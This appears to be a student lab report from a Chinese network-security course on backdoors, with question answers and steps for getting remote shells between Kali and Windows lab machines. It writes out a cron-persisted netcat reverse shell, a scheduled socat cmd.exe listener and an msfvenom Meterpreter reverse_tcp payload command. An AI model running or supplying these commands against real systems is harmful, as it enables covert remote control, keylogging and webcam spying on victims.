20145239《网络对抗》- 后门原理与实践

《网络对抗》—后门原理与实践

基础问题回答

　　1. 例举你能想到的一个后门进入到你系统中的可能方式？

• 我下载了一款游戏或者软件其中有一个不明的程序是捆绑的后门程序。

　　2. 例举你知道的后门如何启动起来(win及linux)的方式？

• Win中的管理工具中可以设置时间点，令任务按计划启动，或者可以伪装成别的程序骗用户点开运行，网页木马。
• Linux下通过cron启动。

　　3. Meterpreter有哪些给你映像深刻的功能？

• 抓屏，开启摄像头，记录敲键记录，查看文件访问记录等。

　　4. 如何发现自己有系统有没有被安装后门？

• 开防火墙、用杀毒软件，入侵检测系统查杀。

实验总结与体会

      在上学期的信息安全技术课程中也学了一些简单的黑客技术的运用，但在本次后门的实验里我更加认识到了黑客技术其实并没有我想的那样高深莫测，很多黑客工具和教程都可以在网上找得到，这一点是非常可怕的。特别是一个简单的MSF后门就可以远程操控和获取目标主机的隐私，警醒了我要经常对电脑进行检测，一些未经免杀的后门还是很容易被查杀的，操作系统有了新的漏洞要及时打补丁，还有电脑摄像头不常用的话就粘起来吧，万一哪天被同学做实验躺了枪岂不是很尬尴？

实践过程记录

常用后门工具

• netcat又名nc,ncat,（linux一般自带）,底层工具，进行基本的TCP UDP数据收发
• meterpreter的msfenom命令生成后门可执行文件

常用后门工具实践

Windows获得Linux Shell

1. 在Windows下查看本机IP：
   

2. Windows监听5239端口

　　　 

 

　　3. Kali下连接Windows的5239端口。

 

　　4. 连接完成后即可互相发送消息：

　　

　　

 

　　5. 也可以获得一个shell，利用ls命令查看目标主机文件：
　　

　　

 

Linux获得Windows Shell

1. linux下用ifconfig查看IP：
   

2. 使用nc监听5239端口：
   

3. 在Windows下，反向连接linux的5239端口：
   

4. 成功连接，出现windows命令行：
   

使用netcat获取主机操作Shell，cron启动

1. 先在Windows系统下，监听5239端口：
   

2. 用crontab -e指令编辑一条定时任务，最后一行修改为36 * * * * /bin/netcat 192.168.199.145 5239 -e /bin/sh，在每个小时的第36分钟反向连接Windows主机的5239端口：

3. 当36分时，获得linux的shell，可以输入指令：
   

使用socat获取主机操作Shell, 任务计划启动

1. 在Windows系统下，打开控制面板->管理工具->任务计划程序，创建任务，填写任务名称，新建一个触发器：

2. 在操作->程序或脚本中选择你的socat.exe文件的路径，在添加参数一栏填写tcp-listen:5239 exec:cmd.exe,pty,stderr
   

3. 锁住电脑再开启，发现后门开始运行：
   

4. linux下输入指令socat - tcp:192.168.1.200:5239，发现已经成功获得了一个cmd shell：
   

使用MSF meterpreter生成可执行文件，利用ncat或socat传送到主机并运行获取主机Shell

1. 输入msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.119.128 LPORT=5239 -f exe > 20145239_backdoor.exe生成后门程序：
   

2. 通过nc指令将生成的后门程序传送到Windows主机上：

 

　　　　　　　　

　　　　　　　　

 

　　　　　　3. 使用msfconsole指令

　　　　　　

        　　　4. 打开Windows上的后门程序：
　　　　　　　　

使用MSF meterpreter生成获取目标主机音频、摄像头、击键记录等内容，并尝试提权

• 获得shell

• 截屏

• 然而当我正玩的津津有味时突然弹出一条消息说windows defender查杀了我的后门
• 然后我重新传送了后门程序以后发现后门再也无法在windows环境下打开了